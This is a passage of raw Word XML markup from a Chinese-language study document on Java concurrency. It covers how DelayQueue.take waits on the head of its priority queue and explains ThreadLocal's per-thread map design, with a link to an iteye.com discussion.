                      <a:ext cx="5274310" cy="2911550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD13CD" w:rsidRPr="00CD13CD" w:rsidRDefault="00CD13CD" w:rsidP="00CD13CD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="381"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD13CD" w:rsidRDefault="00CD13CD" w:rsidP="00CD13CD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>take</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法，把优先队列</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>拿出来（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>peek</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>），如果没有达到延时阀值，则进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>处理。如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD13CD" w:rsidRPr="001B6ED1" w:rsidRDefault="00CD13CD" w:rsidP="00CD13CD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4599305" cy="5807075"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="29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4" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4599305" cy="5807075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E57776" w:rsidRPr="00F41A4C" w:rsidRDefault="00E57776" w:rsidP="00E57776">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="007670E7" w:rsidRPr="007670E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ThreadLocal</w:t>
      </w:r>
      <w:r w:rsidR="007670E7" w:rsidRPr="007670E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的设计理念与作用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B56287" w:rsidRDefault="0096511A" w:rsidP="0096511A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B56287" w:rsidRPr="000349BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>当使用</w:t>
      </w:r>
      <w:r w:rsidR="00B56287" w:rsidRPr="000349BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ThreadLocal</w:t>
      </w:r>
      <w:r w:rsidR="00B56287" w:rsidRPr="000349BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>维护变量时，</w:t>
      </w:r>
      <w:r w:rsidR="00B56287" w:rsidRPr="000349BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ThreadLocal</w:t>
      </w:r>
      <w:r w:rsidR="00B56287" w:rsidRPr="000349BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>为每个使用该变量的线程提供独立的变量副本，所以每一个线程都可以独立地改变自己的副本，而不会影响其它线程所对应的副本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096511A" w:rsidRPr="0096511A" w:rsidRDefault="0096511A" w:rsidP="0096511A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>首先，</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ThreadLocal </w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>不是用来解决共享对象的多线程访问问题的，一般情况下，通过</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ThreadLocal.set() </w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>到线程中的对象是该线程自己使用的对象，其他线程是不需要访问的，也访问不到的。各个线程中访问的是不同的对象。</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096511A" w:rsidRPr="0096511A" w:rsidRDefault="0096511A" w:rsidP="0096511A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>另外，说</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ThreadLocal</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>使得各线程能够保持各自独立的一个对象，并不是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ThreadLocal.set()</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>来实现的，而是通过每个线程中的</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的操作来创建的对象，每个线程创建一个，不是什么对象的拷贝或副本。通过</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ThreadLocal.set()</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>将这个新创建的对象的引用保存到各线程的自己的一个</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>中，每个线程都有这样一个</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，执行</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ThreadLocal.get()</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>时，各线程从自己的</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>中取出放进去的对象，因此取出来的是各自自己线程中的对象，</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ThreadLocal</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>实例是作为</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>来使用的。</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096511A" w:rsidRDefault="0096511A" w:rsidP="0096511A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ThreadLocal.set()</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>进去的东西本来就是多个线程共享的同一个对象，那么多个线程的</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ThreadLocal.get()</w:t>
      </w:r>
      <w:r w:rsidRPr="0096511A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>取得的还是这个共享对象本身，还是有并发访问问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F0928" w:rsidRDefault="001F0928" w:rsidP="0096511A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2204588"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="29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5" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2204588"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F0928" w:rsidRDefault="001F0928" w:rsidP="0096511A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0928">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://www.iteye.com/topic/103804</w:t>
      </w:r>
    </w:p>
